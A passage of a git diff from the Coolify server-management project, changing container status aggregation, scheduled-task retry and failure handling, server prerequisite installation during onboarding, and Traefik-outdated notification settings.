collect(); + // TODO: Swarm is not supported yet if (! $this->data) { throw new \Exception('No data provided'); @@ -108,7 +128,6 @@ public function handle() $this->server->sentinelHeartbeat(); $this->containers = collect(data_get($data, 'containers')); - $filesystemUsageRoot = data_get($data, 'filesystem_usage_root.used_percentage'); ServerStorageCheckJob::dispatch($this->server, $filesystemUsageRoot); @@ -141,65 +160,88 @@ public function handle() foreach ($this->containers as $container) { $containerStatus = data_get($container, 'state', 'exited'); - $containerHealth = data_get($container, 'health_status', 'unhealthy'); - $containerStatus = "$containerStatus ($containerHealth)"; + $rawHealthStatus = data_get($container, 'health_status'); + $containerHealth = $rawHealthStatus ?? 'unknown'; + // Only append health status if container is not exited + if ($containerStatus !== 'exited') { + $containerStatus = "$containerStatus:$containerHealth"; + } $labels = collect(data_get($container, 'labels')); $coolify_managed = $labels->has('coolify.managed'); - if ($coolify_managed) { - $name = data_get($container, 'name'); - if ($name === 'coolify-log-drain' && $this->isRunning($containerStatus)) { - $this->foundLogDrainContainer = true; - } - if ($labels->has('coolify.applicationId')) { - $applicationId = $labels->get('coolify.applicationId'); - $pullRequestId = $labels->get('coolify.pullRequestId', '0'); - try { - if ($pullRequestId === '0') { - if ($this->allApplicationIds->contains($applicationId) && $this->isRunning($containerStatus)) { - $this->foundApplicationIds->push($applicationId); - } - // Store container status for aggregation - if (! $this->applicationContainerStatuses->has($applicationId)) { - $this->applicationContainerStatuses->put($applicationId, collect()); - } - $containerName = $labels->get('com.docker.compose.service'); - if ($containerName) { - $this->applicationContainerStatuses->get($applicationId)->put($containerName, $containerStatus); - } - } else { - $previewKey = $applicationId.':'.$pullRequestId; - if ($this->allApplicationPreviewsIds->contains($previewKey) && $this->isRunning($containerStatus)) { - $this->foundApplicationPreviewsIds->push($previewKey); - } - $this->updateApplicationPreviewStatus($applicationId, $pullRequestId, $containerStatus); + + if (! $coolify_managed) { + continue; + } + + $name = data_get($container, 'name'); + if ($name === 'coolify-log-drain' && $this->isRunning($containerStatus)) { + $this->foundLogDrainContainer = true; + } + if ($labels->has('coolify.applicationId')) { + $applicationId = $labels->get('coolify.applicationId'); + $pullRequestId = $labels->get('coolify.pullRequestId', '0'); + try { + if ($pullRequestId === '0') { + if ($this->allApplicationIds->contains($applicationId)) { + $this->foundApplicationIds->push($applicationId); + } + // Store container status for aggregation + if (! $this->applicationContainerStatuses->has($applicationId)) { + $this->applicationContainerStatuses->put($applicationId, collect()); + } + $containerName = $labels->get('com.docker.compose.service'); + if ($containerName) { + $this->applicationContainerStatuses->get($applicationId)->put($containerName, $containerStatus); } - } catch (\Exception $e) { - } - } elseif ($labels->has('coolify.serviceId')) { - $serviceId = $labels->get('coolify.serviceId'); - $subType = $labels->get('coolify.service.subType'); - $subId = $labels->get('coolify.service.subId'); - if ($subType === 'application' && $this->isRunning($containerStatus)) { - $this->foundServiceApplicationIds->push($subId); - $this->updateServiceSubStatus($serviceId, $subType, $subId, $containerStatus); - } elseif ($subType === 'database' && $this->isRunning($containerStatus)) { - $this->foundServiceDatabaseIds->push($subId); - $this->updateServiceSubStatus($serviceId, $subType, $subId, $containerStatus); - } - } else { - $uuid = $labels->get('com.docker.compose.service'); - $type = $labels->get('coolify.type'); - if ($name === 'coolify-proxy' && $this->isRunning($containerStatus)) { - $this->foundProxy = true; - } elseif ($type === 'service' && $this->isRunning($containerStatus)) { } else { - if ($this->allDatabaseUuids->contains($uuid) && $this->isRunning($containerStatus)) { - $this->foundDatabaseUuids->push($uuid); - if ($this->allTcpProxyUuids->contains($uuid) && $this->isRunning($containerStatus)) { - $this->updateDatabaseStatus($uuid, $containerStatus, tcpProxy: true); - } else { - $this->updateDatabaseStatus($uuid, $containerStatus, tcpProxy: false); - } + $previewKey = $applicationId.':'.$pullRequestId; + if ($this->allApplicationPreviewsIds->contains($previewKey)) { + $this->foundApplicationPreviewsIds->push($previewKey); + } + $this->updateApplicationPreviewStatus($applicationId, $pullRequestId, $containerStatus); + } + } catch (\Exception $e) { + } + } elseif ($labels->has('coolify.serviceId')) { + $serviceId = $labels->get('coolify.serviceId'); + $subType = $labels->get('coolify.service.subType'); + $subId = $labels->get('coolify.service.subId'); + if ($subType === 'application') { + $this->foundServiceApplicationIds->push($subId); + // Store container status for aggregation + $key = $serviceId.':'.$subType.':'.$subId; + if (! $this->serviceContainerStatuses->has($key)) { + $this->serviceContainerStatuses->put($key, collect()); + } + $containerName = $labels->get('com.docker.compose.service'); + if ($containerName) { + $this->serviceContainerStatuses->get($key)->put($containerName, $containerStatus); + } + } elseif ($subType === 'database') { + $this->foundServiceDatabaseIds->push($subId); + // Store container status for aggregation + $key = $serviceId.':'.$subType.':'.$subId; + if (! $this->serviceContainerStatuses->has($key)) { + $this->serviceContainerStatuses->put($key, collect()); + } + $containerName = $labels->get('com.docker.compose.service'); + if ($containerName) { + $this->serviceContainerStatuses->get($key)->put($containerName, $containerStatus); + } + } + } else { + $uuid = $labels->get('com.docker.compose.service'); + $type = $labels->get('coolify.type'); + if ($name === 'coolify-proxy' && $this->isRunning($containerStatus)) { + $this->foundProxy = true; + } elseif ($type === 'service' && $this->isRunning($containerStatus)) { + } else { + if ($this->allDatabaseUuids->contains($uuid) && $this->isRunning($containerStatus)) { + $this->foundDatabaseUuids->push($uuid); + if ($this->allTcpProxyUuids->contains($uuid) && $this->isRunning($containerStatus)) { + $this->updateDatabaseStatus($uuid, $containerStatus, tcpProxy: true); + } else { + $this->updateDatabaseStatus($uuid, $containerStatus, tcpProxy: false); } } } @@ -218,6 +260,9 @@ public function handle() // Aggregate multi-container application statuses $this->aggregateMultiContainerStatuses(); + // Aggregate multi-container service statuses + $this->aggregateServiceContainerStatuses(); + $this->checkLogDrainContainer(); } @@ -235,57 +280,28 @@ private function aggregateMultiContainerStatuses() // Parse docker compose to check for excluded containers $dockerComposeRaw = data_get($application, 'docker_compose_raw'); - $excludedContainers = collect(); - - if ($dockerComposeRaw) { - try { - $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($dockerComposeRaw); - $services = data_get($dockerCompose, 'services', []); - - foreach ($services as $serviceName => $serviceConfig) { - // Check if container should be excluded - $excludeFromHc = data_get($serviceConfig, 'exclude_from_hc', false); - $restartPolicy = data_get($serviceConfig, 'restart', 'always'); - - if ($excludeFromHc || $restartPolicy === 'no') { - $excludedContainers->push($serviceName); - } - } - } catch (\Exception $e) { - // If we can't parse, treat all containers as included - } - } + $excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw); // Filter out excluded containers $relevantStatuses = $containerStatuses->filter(function ($status, $containerName) use ($excludedContainers) { return ! $excludedContainers->contains($containerName); }); - // If all containers are excluded, don't update status + // If all containers are excluded, calculate status from excluded containers if ($relevantStatuses->isEmpty()) { + $aggregatedStatus = $this->calculateExcludedStatusFromStrings($containerStatuses); + + if ($aggregatedStatus && $application->status !== $aggregatedStatus) { + $application->status = $aggregatedStatus; + $application->save(); + } + continue; } - // Aggregate status: if any container is running, app is running - $hasRunning = false; - $hasUnhealthy = false; - - foreach ($relevantStatuses as $status) { - if (str($status)->contains('running')) { - $hasRunning = true; - if (str($status)->contains('unhealthy')) { - $hasUnhealthy = true; - } - } - } - - $aggregatedStatus = null; - if ($hasRunning) { - $aggregatedStatus = $hasUnhealthy ? 'running (unhealthy)' : 'running (healthy)'; - } else { - // All containers are exited - $aggregatedStatus = 'exited (unhealthy)'; - } + // Use ContainerStatusAggregator service for state machine logic + $aggregator = new ContainerStatusAggregator; + $aggregatedStatus = $aggregator->aggregateFromStrings($relevantStatuses, 0); // Update application status with aggregated result if ($aggregatedStatus && $application->status !== $aggregatedStatus) { @@ -295,6 +311,66 @@ private function aggregateMultiContainerStatuses() } } + private function aggregateServiceContainerStatuses() + { + if ($this->serviceContainerStatuses->isEmpty()) { + return; + } + + foreach ($this->serviceContainerStatuses as $key => $containerStatuses) { + // Parse key: serviceId:subType:subId + [$serviceId, $subType, $subId] = explode(':', $key); + + $service = $this->services->where('id', $serviceId)->first(); + if (! $service) { + continue; + } + + // Get the service sub-resource (ServiceApplication or ServiceDatabase) + $subResource = null; + if ($subType === 'application') { + $subResource = $service->applications()->where('id', $subId)->first(); + } elseif ($subType === 'database') { + $subResource = $service->databases()->where('id', $subId)->first(); + } + + if (! $subResource) { + continue; + } + + // Parse docker compose from service to check for excluded containers + $dockerComposeRaw = data_get($service, 'docker_compose_raw'); + $excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw); + + // Filter out excluded containers + $relevantStatuses = $containerStatuses->filter(function ($status, $containerName) use ($excludedContainers) { + return ! $excludedContainers->contains($containerName); + }); + + // If all containers are excluded, calculate status from excluded containers + if ($relevantStatuses->isEmpty()) { + $aggregatedStatus = $this->calculateExcludedStatusFromStrings($containerStatuses); + if ($aggregatedStatus && $subResource->status !== $aggregatedStatus) { + $subResource->status = $aggregatedStatus; + $subResource->save(); + } + + continue; + } + + // Use ContainerStatusAggregator service for state machine logic + // NOTE: Sentinel does NOT provide restart count data, so maxRestartCount is always 0 + $aggregator = new ContainerStatusAggregator; + $aggregatedStatus = $aggregator->aggregateFromStrings($relevantStatuses, 0); + + // Update service sub-resource status with aggregated result + if ($aggregatedStatus && $subResource->status !== $aggregatedStatus) { + $subResource->status = $aggregatedStatus; + $subResource->save(); + } + } + } + private function updateApplicationStatus(string $applicationId, string $containerStatus) { $application = $this->applications->where('id', $applicationId)->first(); diff --git a/app/Jobs/RestartProxyJob.php b/app/Jobs/RestartProxyJob.php index dba4f4ac8..e3e809c8d 100644 --- a/app/Jobs/RestartProxyJob.php +++ b/app/Jobs/RestartProxyJob.php @@ -31,12 +31,12 @@ public function __construct(public Server $server) {} public function handle() { try { - StopProxy::run($this->server); + StopProxy::run($this->server, restarting: true); $this->server->proxy->force_stop = false; $this->server->save(); - StartProxy::run($this->server, force: true); + StartProxy::run($this->server, force: true, restarting: true); } catch (\Throwable $e) { return handleError($e); diff --git a/app/Jobs/ScheduledJobManager.php b/app/Jobs/ScheduledJobManager.php index 9937444b8..75ff883c2 100644 --- a/app/Jobs/ScheduledJobManager.php +++ b/app/Jobs/ScheduledJobManager.php @@ -52,7 +52,7 @@ public function middleware(): array { return [ (new WithoutOverlapping('scheduled-job-manager')) - ->expireAfter(60) // Lock expires after 1 minute to prevent stale locks + ->expireAfter(90) // Lock expires after 90s to handle high-load environments with many tasks ->dontRelease(), // Don't re-queue on lock conflict ]; } diff --git a/app/Jobs/ScheduledTaskJob.php b/app/Jobs/ScheduledTaskJob.php index 609595356..e55db5440 100644 --- a/app/Jobs/ScheduledTaskJob.php +++ b/app/Jobs/ScheduledTaskJob.php @@ -18,14 +18,30 @@ use Illuminate\Foundation\Bus\Dispatchable; use Illuminate\Queue\InteractsWithQueue; use Illuminate\Queue\SerializesModels; +use Illuminate\Support\Facades\Log; class ScheduledTaskJob implements ShouldQueue { use Dispatchable, InteractsWithQueue, Queueable, SerializesModels; + /** + * The number of times the job may be attempted. + */ + public $tries = 3; + + /** + * The maximum number of unhandled exceptions to allow before failing. + */ + public $maxExceptions = 1; + + /** + * The number of seconds the job can run before timing out. + */ + public $timeout = 300; + public Team $team; - public Server $server; + public ?Server $server = null; public ScheduledTask $task; @@ -33,6 +49,11 @@ class ScheduledTaskJob implements ShouldQueue public ?ScheduledTaskExecution $task_log = null; + /** + * Store execution ID to survive job serialization for timeout handling. + */ + protected ?int $executionId = null; + public string $task_status = 'failed'; public ?string $task_output = null; @@ -55,6 +76,9 @@ public function __construct($task) } $this->team = Team::findOrFail($task->team_id); $this->server_timezone = $this->getServerTimezone(); + + // Set timeout from task configuration + $this->timeout = $this->task->timeout ?? 300; } private function getServerTimezone(): string @@ -70,11 +94,18 @@ private function getServerTimezone(): string public function handle(): void { + $startTime = Carbon::now(); + try { $this->task_log = ScheduledTaskExecution::create([ 'scheduled_task_id' => $this->task->id, + 'started_at' => $startTime, + 'retry_count' => $this->attempts() - 1, ]); + // Store execution ID for timeout handling + $this->executionId = $this->task_log->id; + $this->server = $this->resource->destination->server; if ($this->resource->type() === 'application') { @@ -129,15 +160,101 @@ public function handle(): void 'message' => $this->task_output ?? $e->getMessage(), ]); } - $this->team?->notify(new TaskFailed($this->task, $e->getMessage())); + + // Log the error to the scheduled-errors channel + Log::channel('scheduled-errors')->error('ScheduledTask execution failed', [ + 'job' => 'ScheduledTaskJob', + 'task_id' => $this->task->uuid, + 'task_name' => $this->task->name, + 'server' => $this->server?->name ?? 'unknown', + 'attempt' => $this->attempts(), + 'error' => $e->getMessage(), + ]); + + // Only notify and throw on final failure + + // Re-throw to trigger Laravel's retry mechanism with backoff throw $e; } finally { ScheduledTaskDone::dispatch($this->team->id); if ($this->task_log) { + $finishedAt = Carbon::now(); + $duration = round($startTime->floatDiffInSeconds($finishedAt), 2); + $this->task_log->update([ - 'finished_at' => Carbon::now()->toImmutable(), + 'finished_at' => $finishedAt->toImmutable(), + 'duration' => $duration, ]); } } } + + /** + * Calculate the number of seconds to wait before retrying the job. + */ + public function backoff(): array + { + return [30, 60, 120]; // 30s, 60s, 120s between retries + } + + /** + * Handle a job failure. + */ + public function failed(?\Throwable $exception): void + { + Log::channel('scheduled-errors')->error('ScheduledTask permanently failed', [ + 'job' => 'ScheduledTaskJob', + 'task_id' => $this->task->uuid, + 'task_name' => $this->task->name, + 'server' => $this->server?->name ?? 'unknown', + 'total_attempts' => $this->attempts(), + 'error' => $exception?->getMessage(), + 'trace' => $exception?->getTraceAsString(), + ]); + + // Reload execution log from database + // When a job times out, failed() is called in a fresh process with the original + // queue payload, so $executionId will be null. We need to query for the latest execution. + $execution = null; + + // Try to find execution using stored ID first (works for non-timeout failures) + if ($this->executionId) { + $execution = ScheduledTaskExecution::find($this->executionId); + } + + // If no stored ID or not found, query for the most recent execution log for this task + if (! $execution) { + $execution = ScheduledTaskExecution::query() + ->where('scheduled_task_id', $this->task->id) + ->orderBy('created_at', 'desc') + ->first(); + } + + // Last resort: check task_log property + if (! $execution && $this->task_log) { + $execution = $this->task_log; + } + + if ($execution) { + $errorMessage = 'Job permanently failed after '.$this->attempts().' attempts'; + if ($exception) { + $errorMessage .= ': '.$exception->getMessage(); + } + + $execution->update([ + 'status' => 'failed', + 'message' => $errorMessage, + 'error_details' => $exception?->getTraceAsString(), + 'finished_at' => Carbon::now()->toImmutable(), + ]); + } else { + Log::channel('scheduled-errors')->warning('Could not find execution log to update', [ + 'execution_id' => $this->executionId, + 'task_id' => $this->task->uuid, + ]); + } + + // Notify team about permanent failure + $this->team?->notify(new TaskFailed($this->task, $exception?->getMessage() ?? 'Unknown error')); + } } diff --git a/app/Jobs/ServerManagerJob.php b/app/Jobs/ServerManagerJob.php index 043845c00..45ab1dde8 100644 --- a/app/Jobs/ServerManagerJob.php +++ b/app/Jobs/ServerManagerJob.php @@ -87,7 +87,7 @@ private function dispatchConnectionChecks(Collection $servers): void Log::channel('scheduled-errors')->error('Failed to dispatch ServerConnectionCheck', [ 'server_id' => $server->id, 'server_name' => $server->name, - 'error' => $e->getMessage(), + 'error' => get_class($e).': '.$e->getMessage(), ]); } }); @@ -103,7 +103,7 @@ private function processScheduledTasks(Collection $servers): void Log::channel('scheduled-errors')->error('Error processing server tasks', [ 'server_id' => $server->id, 'server_name' => $server->name, - 'error' => $e->getMessage(), + 'error' => get_class($e).': '.$e->getMessage(), ]); } } diff --git a/app/Jobs/ValidateAndInstallServerJob.php b/app/Jobs/ValidateAndInstallServerJob.php index 388791f10..b5e1929de 100644 --- a/app/Jobs/ValidateAndInstallServerJob.php +++ b/app/Jobs/ValidateAndInstallServerJob.php @@ -72,6 +72,42 @@ public function handle(): void return; } + // Check and install prerequisites + $validationResult = $this->server->validatePrerequisites(); + if (! $validationResult['success']) { + if ($this->numberOfTries >= $this->maxTries) { + $missingCommands = implode(', ', $validationResult['missing']); + $errorMessage = "Prerequisites ({$missingCommands}) could not be installed after {$this->maxTries} attempts. Please install them manually before continuing."; + $this->server->update([ + 'validation_logs' => $errorMessage, + 'is_validating' => false, + ]); + Log::error('ValidateAndInstallServer: Prerequisites installation failed after max tries', [ + 'server_id' => $this->server->id, + 'attempts' => $this->numberOfTries, + 'missing_commands' => $validationResult['missing'], + 'found_commands' => $validationResult['found'], + ]); + + return; + } + + Log::info('ValidateAndInstallServer: Installing prerequisites', [ + 'server_id' => $this->server->id, + 'attempt' => $this->numberOfTries + 1, + 'missing_commands' => $validationResult['missing'], + 'found_commands' => $validationResult['found'], + ]); + + // Install prerequisites + $this->server->installPrerequisites(); + + // Retry validation after installation + self::dispatch($this->server, $this->numberOfTries + 1)->delay(now()->addSeconds(30)); + + return; + } + // Check if Docker is installed $dockerInstalled = $this->server->validateDockerEngine(); $dockerComposeInstalled = $this->server->validateDockerCompose(); @@ -132,6 +168,9 @@ public function handle(): void if (! $this->server->isBuildServer()) { $proxyShouldRun = CheckProxy::run($this->server, true); if ($proxyShouldRun) { + // Ensure networks exist BEFORE dispatching async proxy startup + // This prevents race condition where proxy tries to start before networks are created + instant_remote_process(ensureProxyNetworksExist($this->server)->toArray(), $this->server, false); StartProxy::dispatch($this->server); } } diff --git a/app/Livewire/ActivityMonitor.php b/app/Livewire/ActivityMonitor.php index 54034ef7a..bc310e715 100644 --- a/app/Livewire/ActivityMonitor.php +++ b/app/Livewire/ActivityMonitor.php @@ -10,7 +10,7 @@ class ActivityMonitor extends Component { public ?string $header = null; - public $activityId; + public $activityId = null; public $eventToDispatch = 'activityFinished'; @@ -28,12 +28,20 @@ class ActivityMonitor extends Component protected $listeners = ['activityMonitor' => 'newMonitorActivity']; - public function newMonitorActivity($activityId, $eventToDispatch = 'activityFinished', $eventData = null) + public function newMonitorActivity($activityId, $eventToDispatch = 'activityFinished', $eventData = null, $header = null) { + // Reset event dispatched flag for new activity + self::$eventDispatched = false; + $this->activityId = $activityId; $this->eventToDispatch = $eventToDispatch; $this->eventData = $eventData; + // Update header if provided + if ($header !== null) { + $this->header = $header; + } + $this->hydrateActivity(); $this->isPollingActive = true; @@ -41,9 +49,24 @@ public function newMonitorActivity($activityId, $eventToDispatch = 'activityFini public function hydrateActivity() { + if ($this->activityId === null) { + $this->activity = null; + + return; + } + $this->activity = Activity::find($this->activityId); } + public function updatedActivityId($value) + { + if ($value) { + $this->hydrateActivity(); + $this->isPollingActive = true; + self::$eventDispatched = false; + } + } + public function polling() { $this->hydrateActivity(); diff --git a/app/Livewire/Boarding/Index.php b/app/Livewire/Boarding/Index.php index 7912c4b85..ab1a1aae9 100644 --- a/app/Livewire/Boarding/Index.php +++ b/app/Livewire/Boarding/Index.php @@ -14,7 +14,10 @@ class Index extends Component { - protected $listeners = ['refreshBoardingIndex' => 'validateServer']; + protected $listeners = [ + 'refreshBoardingIndex' => 'validateServer', + 'prerequisitesInstalled' => 'handlePrerequisitesInstalled', + ]; #[\Livewire\Attributes\Url(as: 'step', history: true)] public string $currentState = 'welcome'; @@ -76,6 +79,10 @@ class Index extends Component public ?string $minDockerVersion = null; + public int $prerequisiteInstallAttempts = 0; + + public int $maxPrerequisiteInstallAttempts = 3; + public function mount() { if (auth()->user()?->isMember() && auth()->user()->currentTeam()->show_boarding === true) { @@ -320,6 +327,62 @@ public function validateServer() return handleError(error: $e, livewire: $this); } + try { + // Check prerequisites + $validationResult = $this->createdServer->validatePrerequisites(); + if (! $validationResult['success']) { + // Check if we've exceeded max attempts + if ($this->prerequisiteInstallAttempts >= $this->maxPrerequisiteInstallAttempts) { + $missingCommands = implode(', ', $validationResult['missing']); + throw new \Exception("Prerequisites ({$missingCommands}) could not be installed after {$this->maxPrerequisiteInstallAttempts} attempts. Please install them manually."); + } + + // Start async installation and wait for completion via ActivityMonitor + $activity = $this->createdServer->installPrerequisites(); + $this->prerequisiteInstallAttempts++; + $this->dispatch('activityMonitor', $activity->id, 'prerequisitesInstalled'); + + // Return early - handlePrerequisitesInstalled() will be called when installation completes + return; + } + + // Prerequisites are already installed, continue with validation + $this->continueValidation(); + } catch (\Throwable $e) { + return handleError(error: $e, livewire: $this); + } + } + + public function handlePrerequisitesInstalled() + { + try { + // Revalidate prerequisites after installation completes + $validationResult = $this->createdServer->validatePrerequisites(); + if (! $validationResult['success']) { + // Installation completed but prerequisites still missing - retry + $missingCommands = implode(', ', $validationResult['missing']); + + if ($this->prerequisiteInstallAttempts >= $this->maxPrerequisiteInstallAttempts) { + throw new \Exception("Prerequisites ({$missingCommands}) could not be installed after {$this->maxPrerequisiteInstallAttempts} attempts. Please install them manually."); + } + + // Try again + $activity = $this->createdServer->installPrerequisites(); + $this->prerequisiteInstallAttempts++; + $this->dispatch('activityMonitor', $activity->id, 'prerequisitesInstalled'); + + return; + } + + // Prerequisites validated successfully - continue with Docker validation + $this->continueValidation(); + } catch (\Throwable $e) { + return handleError(error: $e, livewire: $this); + } + } + + private function continueValidation() + { try { $dockerVersion = instant_remote_process(["docker version|head -2|grep -i version| awk '{print $2}'"], $this->createdServer, true); $dockerVersion = checkMinimumDockerEngineVersion($dockerVersion); @@ -347,6 +410,8 @@ public function selectProxy(?string $proxyType = null) } $this->createdServer->proxy->type = $proxyType; $this->createdServer->proxy->status = 'exited'; + $this->createdServer->proxy->last_saved_settings = null; + $this->createdServer->proxy->last_applied_settings = null; $this->createdServer->save(); $this->getProjects(); } diff --git a/app/Livewire/Notifications/Discord.php b/app/Livewire/Notifications/Discord.php index 28d1cb866..b914fbd94 100644 --- a/app/Livewire/Notifications/Discord.php +++ b/app/Livewire/Notifications/Discord.php @@ -62,6 +62,9 @@ class Discord extends Component #[Validate(['boolean'])] public bool $serverPatchDiscordNotifications = false; + #[Validate(['boolean'])] + public bool $traefikOutdatedDiscordNotifications = true; + #[Validate(['boolean'])] public bool $discordPingEnabled = true; @@ -98,6 +101,7 @@ public function syncData(bool $toModel = false) $this->settings->server_reachable_discord_notifications = $this->serverReachableDiscordNotifications; $this->settings->server_unreachable_discord_notifications = $this->serverUnreachableDiscordNotifications; $this->settings->server_patch_discord_notifications = $this->serverPatchDiscordNotifications; + $this->settings->traefik_outdated_discord_notifications = $this->traefikOutdatedDiscordNotifications; $this->settings->discord_ping_enabled = $this->discordPingEnabled; @@ -120,6 +124,7 @@ public function syncData(bool $toModel = false) $this->serverReachableDiscordNotifications = $this->settings->server_reachable_discord_notifications; $this->serverUnreachableDiscordNotifications = $this->settings->server_unreachable_discord_notifications; $this->serverPatchDiscordNotifications = $this->settings->server_patch_discord_notifications; + $this->traefikOutdatedDiscordNotifications = $this->settings->traefik_outdated_discord_notifications; $this->discordPingEnabled = $this->settings->discord_ping_enabled; } diff --git a/app/Livewire/Notifications/Email.php b/app/Livewire/Notifications/Email.php index d62a08417..847f10765 100644 --- a/app/Livewire/Notifications/Email.php +++ b/app/Livewire/Notifications/Email.php @@ -104,6 +104,9 @@ class Email extends Component #[Validate(['boolean'])] public bool $serverPatchEmailNotifications = false; + #[Validate(['boolean'])] + public bool $traefikOutdatedEmailNotifications = true; + #[Validate(['nullable', 'email'])] public ?string $testEmailAddress = null; @@ -155,6 +158,7 @@ public function syncData(bool $toModel = false) $this->settings->server_reachable_email_notifications = $this->serverReachableEmailNotifications; $this->settings->server_unreachable_email_notifications = $this->serverUnreachableEmailNotifications; $this->settings->server_patch_email_notifications = $this->serverPatchEmailNotifications; + $this->settings->traefik_outdated_email_notifications = $this->traefikOutdatedEmailNotifications; $this->settings->save(); } else { @@ -187,6 +191,7 @@ public function syncData(bool $toModel = false) $this->serverReachableEmailNotifications = $this->settings->server_reachable_email_notifications; $this->serverUnreachableEmailNotifications = $this->settings->server_unreachable_email_notifications; $this->serverPatchEmailNotifications = $this->settings->server_patch_email_notifications; + $this->traefikOutdatedEmailNotifications = $this->settings->traefik_outdated_email_notifications; } } diff --git a/app/Livewire/Notifications/Pushover.php b/app/Livewire/Notifications/Pushover.php index 9c7ff64ad..d79eea87b 100644 --- a/app/Livewire/Notifications/Pushover.php +++ b/app/Livewire/Notifications/Pushover.php @@ -70,6 +70,9 @@ class Pushover extends Component #[Validate(['boolean'])] public bool $serverPatchPushoverNotifications = false; + #[Validate(['boolean'])] + public bool $traefikOutdatedPushoverNotifications = true; + public function mount() { try { @@ -104,6 +107,7 @@ public function syncData(bool $toModel = false) $this->settings->server_reachable_pushover_notifications = $this->serverReachablePushoverNotifications; $this->settings->server_unreachable_pushover_notifications = $this->serverUnreachablePushoverNotifications; $this->settings->server_patch_pushover_notifications = $this->serverPatchPushoverNotifications; + $this->settings->traefik_outdated_pushover_notifications = $this->traefikOutdatedPushoverNotifications; $this->settings->save(); refreshSession(); @@ -125,6 +129,7 @@ public function syncData(bool $toModel = false) $this->serverReachablePushoverNotifications = $this->settings->server_reachable_pushover_notifications; $this->serverUnreachablePushoverNotifications = $this->settings->server_unreachable_pushover_notifications; $this->serverPatchPushoverNotifications = $this->settings->server_patch_pushover_notifications; + $this->traefikOutdatedPushoverNotifications = $this->settings->traefik_outdated_pushover_notifications; } } diff --git a/app/Livewire/Notifications/Slack.php b/app/Livewire/Notifications/Slack.php index d21399c42..fa8c97ae9 100644 --- a/app/Livewire/Notifications/Slack.php +++ b/app/Livewire/Notifications/Slack.php @@ -67,6 +67,9 @@ class Slack extends Component #[Validate(['boolean'])] public bool $serverPatchSlackNotifications = false; + #[Validate(['boolean'])] + public bool $traefikOutdatedSlackNotifications = true; + public function mount() { try { @@ -100,6 +103,7 @@ public function syncData(bool $toModel = false) $this->settings->server_reachable_slack_notifications = $this->serverReachableSlackNotifications; $this->settings->server_unreachable_slack_notifications = $this->serverUnreachableSlackNotifications; $this->settings->server_patch_slack_notifications = $this->serverPatchSlackNotifications; + $this->settings->traefik_outdated_slack_notifications = $this->traefikOutdatedSlackNotifications; $this->settings->save(); refreshSession(); @@ -120,6 +124,7 @@ public function syncData(bool $toModel = false) $this->serverReachableSlackNotifications = $this->settings->server_reachable_slack_notifications; $this->serverUnreachableSlackNotifications = $this->settings->server_unreachable_slack_notifications; $this->serverPatchSlackNotifications = $this->settings->server_patch_slack_notifications; + $this->traefikOutdatedSlackNotifications = $this->settings->traefik_outdated_slack_notifications; } } diff --git a/app/Livewire/Notifications/Telegram.php b/app/Livewire/Notifications/Telegram.php index ca9df47c1..fc3966cf6 100644 --- a/app/Livewire/Notifications/Telegram.php +++ b/app/Livewire/Notifications/Telegram.php @@ -70,6 +70,9 @@ class Telegram extends Component #[Validate(['boolean'])] public bool $serverPatchTelegramNotifications = false; + #[Validate(['boolean'])] + public bool $traefikOutdatedTelegramNotifications = true; + #[Validate(['nullable', 'string'])] public ?string $telegramNotificationsDeploymentSuccessThreadId = null; @@ -109,6 +112,9 @@ class Telegram extends Component #[Validate(['nullable', 'string'])] public ?string $telegramNotificationsServerPatchThreadId = null; + #[Validate(['nullable', 'string'])] + public ?string $telegramNotificationsTraefikOutdatedThreadId = null; + public function mount() { try { @@ -143,6 +149,7 @@ public function syncData(bool $toModel = false) $this->settings->server_reachable_telegram_notifications = $this->serverReachableTelegramNotifications; $this->settings->server_unreachable_telegram_notifications = $this->serverUnreachableTelegramNotifications; $this->settings->server_patch_telegram_notifications = $this->serverPatchTelegramNotifications; + $this->settings->traefik_outdated_telegram_notifications = $this->traefikOutdatedTelegramNotifications; $this->settings->telegram_notifications_deployment_success_thread_id = $this->telegramNotificationsDeploymentSuccessThreadId; $this->settings->telegram_notifications_deployment_failure_thread_id = $this->telegramNotificationsDeploymentFailureThreadId; @@ -157,6 +164,7 @@ public function syncData(bool $toModel = false) $this->settings->telegram_notifications_server_reachable_thread_id = $this->telegramNotificationsServerReachableThreadId; $this->settings->telegram_notifications_server_unreachable_thread_id = $this->telegramNotificationsServerUnreachableThreadId; $this->settings->telegram_notifications_server_patch_thread_id = $this->telegramNotificationsServerPatchThreadId; + $this->settings->telegram_notifications_traefik_outdated_thread_id = $this->telegramNotificationsTraefikOutdatedThreadId; $this->settings->save(); } else { @@ -177,6 +185,7 @@ public function syncData(bool $toModel = false) $this->serverReachableTelegramNotifications = $this->settings->server_reachable_telegram_notifications; $this->serverUnreachableTelegramNotifications = $this->settings->server_unreachable_telegram_notifications; $this->serverPatchTelegramNotifications = $this->settings->server_patch_telegram_notifications; + $this->traefikOutdatedTelegramNotifications = $this->settings->traefik_outdated_telegram_notifications; $this->telegramNotificationsDeploymentSuccessThreadId = $this->settings->telegram_notifications_deployment_success_thread_id; $this->telegramNotificationsDeploymentFailureThreadId = $this->settings->telegram_notifications_deployment_failure_thread_id; @@ -191,6 +200,7 @@ public function syncData(bool $toModel = false) $this->telegramNotificationsServerReachableThreadId = $this->settings->telegram_notifications_server_reachable_thread_id; $this->telegramNotificationsServerUnreachableThreadId = $this->settings->telegram_notifications_server_unreachable_thread_id; $this->telegramNotificationsServerPatchThreadId = $this->settings->telegram_notifications_server_patch_thread_id; + $this->telegramNotificationsTraefikOutdatedThreadId = $this->settings->telegram_notifications_traefik_outdated_thread_id; } } diff --git a/app/Livewire/Notifications/Webhook.php b/app/Livewire/Notifications/Webhook.php index cf4e71105..8af70c6eb 100644 --- a/app/Livewire/Notifications/Webhook.php +++ b/app/Livewire/Notifications/Webhook.php @@ -62,6 +62,9 @@ class Webhook extends Component #[Validate(['boolean'])] public bool $serverPatchWebhookNotifications = false; + #[Validate(['boolean'])] + public bool $traefikOutdatedWebhookNotifications = true; + public function mount() { try { @@ -95,6 +98,7 @@ public function syncData(bool $toModel = false) $this->settings->server_reachable_webhook_notifications = $this->serverReachableWebhookNotifications; $this->settings->server_unreachable_webhook_notifications = $this->serverUnreachableWebhookNotifications; $this->settings->server_patch_webhook_notifications = $this->serverPatchWebhookNotifications; + $this->settings->traefik_outdated_webhook_notifications = $this->traefikOutdatedWebhookNotifications; $this->settings->save(); refreshSession(); @@ -115,6 +119,7 @@ public function 